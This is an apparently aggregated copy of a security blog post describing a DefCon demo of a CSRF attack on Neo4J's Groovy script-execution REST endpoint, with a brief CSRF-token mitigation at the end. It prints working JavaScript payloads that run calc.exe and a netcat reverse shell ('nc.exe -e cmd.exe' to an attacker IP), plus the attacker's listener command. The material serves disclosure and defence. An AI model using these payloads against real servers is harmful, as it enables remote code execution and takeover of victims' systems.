|
Neo4J CSRF payload to start processes calc and nc on the server |
Si vous voulez bloquer ce service sur vos fils RSS
Si vous voulez nous contacter ou nous proposer un fil RSS
Menu > Articles de la revue de presse : - l'ensemble [ tous | francophone] - par mots clé [ tous] - par site [ tous] - le tagwall [ voir] - Top bi-hebdo de la revue de presse [ Voir]
Neo4J CSRF payload to start processes calc and nc on the server Par Dinis Cruz BlogLe [2013-08-06] à 04:35:40
Présentation : The first demo that we showed at the DefCon REST Presentation was how to use CSRF to exploit the Neo4J remote code execution feature provided by groovy . The reason CSRF was used, is because by default, the REST API that allows the web UI to pass a groovy script, is only available on localhost. Abe and Alvaro's concern and the reason we showed this in action is that a considerable number of Neo4J admins fail to read the guidance provided here http docs.neo4j.org chunked stable security-server.html image specially this section image As you can see on the draft notes about this image ... there are at least two REST apis that can be used to execute java commands. Starting calc on the server Here is the CSRF exploit scenario the neo4j admin is exposed via email, twitter, reddit, rss feed, etc... to a link pointing to a page that looks like this image Inside that page, there is this payload function var url 'http localhost 7474 db data ext GremlinPlugin graphdb execute_script' var data ' script import java.lang.Runtime rt Runtime.getRuntime .exec c Windows System32 calc.exe , params ' var success function h2 .html 'Class XmlDecoder with some extra juice ' .ajax type POST , url url, data data, contentType application json , success success Here is a quick description of that happens when the page loads jquery is loaded into the page since it was not there a callback function is set to be executed when the page loads a JSON POST request is sent to http localhost 7474 db data ext GremlinPlugin graphdb execute_script with the post data script import java.lang.Runtime rt Runtime.getRuntime .exec c Windows System32 calc.exe , params which is basically a JSON way of saying Hey server, can you execute this groovy script for me import java.lang.Runtime rt Runtime.getRuntime .exec c Windows System32 calc.exe finally as you probably have guessed, that is a simplified Java code snippet to start a new process on the server in this case calc.exe note as a visual clue that the exploit worked, I also set-up an jQuery Ajax onSuccess callback function, to chang the text of an H2 html tag. Sending a reverse shell into an external box Since we were at DefCon, which is mostly about exploitation, I also showed the cool trick of sending a reverse shell into the attacker's computer using nc NetCat . Here it is the set-up to create this reverse shell ... on the attacker's box VM Fusion on OSX execute nc l 1234 ... change the CSRF payload to function var url 'http localhost 7474 db data ext GremlinPlugin graphdb execute_script' var data ' script import java.lang.Runtime rt Runtime.getRuntime .exec .. .. nc.exe -e cmd.exe 192.168.213.1 1234 , params ' var success function h2 .html 'Class XmlDecoder with some even more extra juice ' .ajax type POST , url url, data data, contentType application json , success success ... and open the link on the victim's Windows VM As you saw on by the previous description, this AJAX request triggers the server side execution of .. .. nc.exe -e cmd.exe 192.168.213.1 1234 If you are not that familiar with NetCat nc here is what that command does nc.exe starts NetCat -e cmd.exe starts cmd.exe and binds the cmd.exe process Outputstream into the NetCat s process InputStream, and the cmd.exe process InputStream into the NetCat s process OutputStream 192.168.213.1 IP address of attacker server 1234 port on the attacker's IP which could be set 80 or 443 to try to make the attack more stealth When a feature is a vulnerability This case is interesting because the capability to run java commands on the server is a big feature that comes by default with Neo4J which means that 'this feature' it is part of what makes Neo4J popular, and there is little chance it will be removed The solution then is to add a unique token to the request. For a code sample of what it looks like take a look at this a TeamMentor Article on Cross-Site Request Forgery CSRF Prevention Using Plain Java Server Pages JSP see also these 11 CSRF related articles
Les mots clés de la revue de presse pour cet article : payload server Les videos sur SecuObs pour les mots clés : payload server Les éléments de la revue Twitter pour les mots clé : payload server
Les derniers articles du site "Dinis Cruz Blog" :
- Updated version of BSIMM Questions for Teams now will all activities mapped - First pass at BSIMM questions for teams - Started working on new book Measuring Software Quality using Application Security - When talking about Application Security and Software Quality, Pollution is a much better analogy than Technical Debt - New Era of Software with modern Application Security presentation v1.0 - Simple Threat Model template - Good place to start - JIRA RISK workflow handling of 'Risk Fatigue' - Updated JIRA RISK workflow now with a 'Fixing' State - Presenting at OWASP AppSecEU on Using JIRA to manage Risks and Security Champions activities - Thinking of writing a book called Measuring Software Quality using Application Security
Menu > Articles de la revue de presse : - l'ensemble [ tous | francophone] - par mots clé [ tous] - par site [ tous] - le tagwall [ voir] - Top bi-hebdo de la revue de presse [ Voir]
Si vous voulez bloquer ce service sur vos fils RSS :
- avec iptables "iptables -A INPUT -s 88.190.17.190 --dport 80 -j DROP"
- avec ipfw et wipfw "ipfw add deny from 88.190.17.190 to any 80"
- Nous contacter par mail
Mini-Tagwall des articles publiés sur SecuObs : | | | | sécurité, exploit, windows, attaque, outil, microsoft, réseau, audit, metasploit, vulnérabilité, système, virus, internet, usbsploit, données, source, linux, protocol, présentation, scanne, réseaux, scanner, bluetooth, conférence, reverse, shell, meterpreter, vista, rootkit, détection, mobile, security, malicieux, engineering, téléphone, paquet, trames, https, noyau, utilisant, intel, wishmaster, google, sysun, libre |
Mini-Tagwall de l'annuaire video : | | | | curit, security, biomet, metasploit, biometric, cking, password, windows, botnet, defcon, tutorial, crypt, xploit, exploit, lockpicking, linux, attack, wireshark, vmware, rootkit, conference, network, shmoocon, backtrack, virus, conficker, elcom, etter, elcomsoft, server, meterpreter, openvpn, ettercap, openbs, iphone, shell, openbsd, iptables, securitytube, deepsec, source, office, systm, openssh, radio |
Mini-Tagwall des articles de la revue de presse : | | | | security, microsoft, windows, hacker, attack, network, vulnerability, google, exploit, malware, internet, remote, iphone, server, inject, patch, apple, twitter, mobile, virus, ebook, facebook, vulnérabilité, crypt, source, linux, password, intel, research, virtual, phish, access, tutorial, trojan, social, privacy, firefox, adobe, overflow, office, cisco, conficker, botnet, pirate, sécurité |
Mini-Tagwall des Tweets de la revue Twitter : | | | | security, linux, botnet, attack, metasploit, cisco, defcon, phish, exploit, google, inject, server, firewall, network, twitter, vmware, windows, microsoft, compliance, vulnerability, python, engineering, source, kernel, crypt, social, overflow, nessus, crack, hacker, virus, iphone, patch, virtual, javascript, malware, conficker, pentest, research, email, password, adobe, apache, proxy, backtrack |
|
|
|
|
|